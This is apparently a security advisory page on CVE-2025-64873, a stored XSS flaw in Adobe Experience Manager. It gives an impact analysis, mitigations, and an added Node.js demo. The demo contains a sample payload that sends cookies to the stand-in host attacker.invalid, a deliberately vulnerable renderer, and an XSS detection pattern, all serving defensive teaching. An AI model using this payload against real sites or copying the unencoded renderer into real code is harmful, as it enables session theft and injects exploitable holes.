CVE-2025-64873: Cross-site Scripting (Stored XSS) (CWE-79) in Adobe Experience Manager
Adobe Experience Manager versions 6.5.23 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field.
AI Analysis
Technical Summary
CVE-2025-64873 is a stored Cross-Site Scripting (XSS) vulnerability in Adobe Experience Manager (AEM) versions 6.5.23 and earlier. The flaw arises because user-supplied input in certain form fields is neither sufficiently validated on the way in nor encoded on the way out, so an attacker with a low-privileged account can submit JavaScript that is persisted on the server. Every user who later opens a page that renders the field executes that script in their browser within the origin of the AEM site, which enables theft of session cookies (where they lack the HttpOnly flag), actions performed with the victim's session, and phishing or defacement content injected into the page. The CVSS 3.1 base score of 5.4 (medium) corresponds to the vector AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N: the attack is launched over the network with low complexity and needs only low privileges; the user-interaction component reflects that a victim must browse to the affected page, not that the attacker needs assistance to plant the payload; the scope change records that the script runs in the victim's browser rather than on the AEM server; and confidentiality and integrity are affected while availability is not. Adobe's description does not identify which form fields are affected, so defenders should treat any component that stores and re-renders input from low-privileged users as in scope until the fix is applied. At the time of this analysis no exploitation in the wild had been reported and no official patch was recorded. Because AEM is widely deployed for public-facing and internal portals, a persistent XSS that any low-privileged user can plant is a meaningful risk: the payload survives and reaches many victims over time, and a hijacked session belonging to an author or administrator can escalate to content tampering or exposure of personal data, with the compliance consequences that implies.
Potential Impact
For European organizations, the impact of this vulnerability can be substantial, particularly for those using Adobe Experience Manager to manage customer-facing websites or internal portals. Exploitation could result in unauthorized access to user sessions, theft of sensitive information, and potential manipulation of website content. This could lead to reputational damage, loss of customer trust, and regulatory penalties under GDPR if personal data is compromised. The vulnerability's medium severity indicates that while it does not directly affect system availability, the confidentiality and integrity of user data and interactions are at risk. Organizations in sectors such as finance, healthcare, government, and e-commerce, which often use AEM for digital services, may face increased risk. Additionally, the stored nature of the XSS means that malicious scripts persist and can affect multiple users over time, amplifying potential damage. The lack of a patch at disclosure increases the window of exposure, emphasizing the need for immediate mitigation.
Mitigation Recommendations
The root fix is Adobe's update; apply it as soon as it is available for your 6.5 service pack line and confirm the installed version afterwards. Until then, reduce exposure as follows. Enforce output encoding at every point where stored user input is rendered: in AEM, HTL expressions are context-escaped by default, so audit templates for expressions that disable this with `@ context='unsafe'`, and make sure JSP or Java components pass user content through the XSSAPI service (for example `encodeForHTML`) rather than writing it raw; pair this with server-side validation that rejects markup in fields that have no reason to contain it. Serve a Content Security Policy that disallows inline scripts and event handlers (nonce- or hash-based `script-src`, `object-src 'none'`), which stops an injected script from executing even where encoding is missed; roll it out in report-only mode first so legitimate inline scripts can be found and fixed. Set the HttpOnly and Secure flags on session cookies so a successful injection cannot simply read them. Monitor form submission and access logs for markup, event-handler attributes and `javascript:` URLs in submitted values, and review recently modified content for such payloads, since a stored payload may already be present. Where the affected forms can be identified, restrict who may submit them or disable them temporarily. A web application firewall tuned for XSS payloads adds a layer but is a stopgap, because encoding and obfuscation bypasses are routine. Finally, train developers and administrators on AEM-specific XSS prevention and include stored XSS in regular penetration tests, with particular attention to components that persist and re-render user input.
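As an added example (not code from this page, from Adobe or from AEM), the following Node.js snippet shows the mechanism described in the Technical Summary and three of the controls from the Mitigation Recommendations: a stored form-field renderer in its vulnerable form beside its output-encoded form, the response headers carrying a nonce-based CSP, and a coarse submission-time check usable for log alerting. The payload, the host attacker.invalid and the stored values are constructed for the demonstration.

```javascript
// Added example: a minimal stored form-field renderer in vulnerable and
// hardened forms, plus the response headers and submission-time check from
// the mitigation list. Plain Node.js, not AEM code; every value below is
// constructed for the demonstration and attacker.invalid is a hypothetical host.

// What a low-privileged user might type into a stored field: an <img> tag
// whose onerror handler ships the visitor's cookies to the attacker.
const PAYLOAD = '<img src=x onerror="fetch(\'//attacker.invalid/?c=\'+document.cookie)">';

// Persist a submission the way a form component would. The same stored value
// is rendered to every later visitor, which is what makes the XSS "stored".
function storeSubmission(store, fieldValue) {
  store.push({ value: fieldValue, at: new Date().toISOString() });
  return store;
}

// VULNERABLE renderer: the stored value is concatenated into markup as-is, so
// the browser parses the attacker's tag and runs the event handler.
function renderVulnerable(store) {
  return '<ul>' + store.map((e) => '<li>' + e.value + '</li>').join('') + '</ul>';
}

// Output encoding for the HTML text context: every character that can open or
// close a tag or attribute becomes an entity, so the payload is displayed as
// literal text instead of being parsed.
function escapeHtml(s) {
  const map = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#x27;', '/': '&#x2F;' };
  return String(s).replace(/[&<>"'\/]/g, (c) => map[c]);
}

// HARDENED renderer: identical template, encoding applied at the output boundary.
function renderHardened(store) {
  return '<ul>' + store.map((e) => '<li>' + escapeHtml(e.value) + '</li>').join('') + '</ul>';
}

// True when the only tags in the output are the template's own <ul>/<li>,
// i.e. nothing a user submitted survived as markup.
function onlyTemplateTags(html) {
  return html.replace(/<\/?(ul|li)>/g, '').indexOf('<') === -1;
}

// Defence in depth: a CSP that forbids inline scripts and event handlers, so a
// missed encoding still cannot run attacker JavaScript. The nonce is generated
// per response and attached to the site's own <script> tags.
function securityHeaders(nonce) {
  return {
    'Content-Security-Policy':
      "default-src 'self'; script-src 'self' 'nonce-" + nonce + "'; " +
      "object-src 'none'; base-uri 'none'; frame-ancestors 'none'",
    'X-Content-Type-Options': 'nosniff',
  };
}

// Submission-time indicator for the "monitor for script injection" advice: a
// coarse pattern over the raw field value, meant to raise an alert. It is not
// a substitute for encoding, since such filters are routinely bypassed.
const XSS_INDICATORS = /<\s*\/?\s*(script|img|svg|iframe|object|embed)\b|\bon[a-z]+\s*=|javascript\s*:/i;
function looksLikeXssPayload(fieldValue) {
  return XSS_INDICATORS.test(fieldValue);
}

// Stand-alone walkthrough: one malicious and one benign submission, rendered
// both ways, with the alerting verdict for each stored value.
function demo() {
  const store = storeSubmission([], PAYLOAD);
  storeSubmission(store, 'Normal feedback about the product page.');
  return {
    vulnerable: renderVulnerable(store),
    hardened: renderHardened(store),
    headers: securityHeaders('d2VsbC1yYW5kb20'),
    flagged: store.map((e) => looksLikeXssPayload(e.value)),
  };
}

console.log(demo());
```

Run it with `node` to see the two renderings: the vulnerable output contains the attacker's `<img>` tag intact, the hardened output shows the same payload as visible text, and the CSP ensures that even a future encoding miss cannot execute inline script. In an AEM deployment the equivalent of `escapeHtml` is HTL's default context escaping or an XSSAPI `encodeForHTML` call, and the headers would be set at the web tier (for example the Apache-based dispatcher) or by a servlet filter.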
Affected Countries
Germany, France, United Kingdom, Netherlands, Italy, Spain, Sweden
Technical Details
- Data Version: 5.2
- Assigner Short Name: adobe
- Date Reserved: 2025-11-11T22:48:38.844Z
- CVSS Version: 3.1
- State: PUBLISHED
Threat ID: 6939bdb8fe7b3954b690bedd
Added to database: 12/10/2025, 6:36:40 PM
Last enriched: 12/10/2025, 6:52:59 PM
Last updated: 12/11/2025, 5:58:24 AM